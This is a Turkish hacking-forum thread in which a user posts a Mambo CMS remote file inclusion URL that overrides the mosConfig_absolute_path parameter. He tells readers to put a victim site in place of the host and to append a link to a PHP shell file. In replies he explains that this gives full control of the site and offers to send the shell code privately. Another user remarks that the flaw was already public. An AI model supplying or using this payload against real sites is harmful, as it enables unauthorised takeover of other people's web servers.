Mambo Remote IncudLe FiLe

Phara0h

Banned
Reaction score
0
Merhaba ArkadasLar Bu Kod Herkeste Bulunmaz... Hatta C0gu Team'de BuLunmaz... :) oLay SoyLe : asagidaki HackheLL.Com Yerine Mambo Sitesini Yazin Ve Sonuna Php ListPath'in Txt HaLine Link Verin... S0runuz Varsa S0rabiLirsiniz :)

Kod:
http://www.hackhell.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Phara0h // HackheLL.Com

biladerim ne işe yarar bu kod.....

Hemen SoyLeyeyim Ornegin Ben Php SheLL CaListirdim.. aLLataki Resime Benzer Bir ekran Cikar İstedigini Yaparsin... Eger İstersen Php-SheLL'in KodLarini PM AtabiLirim

option yerine bir şey yazacak mıyız..

Hayir OnunLa Ugrasmayin Kodun Sonuna Bir Php ListPath'in Txt Kodunu Yazin...

option yerine bir şey yazacak mıyız..

Bu acik tüm security sitelerinde yayinlandı. :]] lol Bunun 0day oldugumunu söylemeye calisiyorsun :] ayLar once cikan bir stringi yeni diye göstermek ne menem bir durum anLamadim.. :] biLdigimiz RFI :]

Serqan' Alıntı:
Bu acik tüm security sitelerinde yayinlandı. :]] lol Bunun 0day oldugumunu söylemeye calisiyorsun :] ayLar once cikan bir stringi yeni diye göstermek ne menem bir durum anLamadim.. :] biLdigimiz RFI :]

herşeye bi kulp takıcanıza,sizde bişiler paylaşın..

Serqan' Alıntı:

Ben Yeni Demiy0rum ki Bircok Site ve Team'de BuLunmaz Diy0rum.. GozunLe Oku Istersen ;)

Geri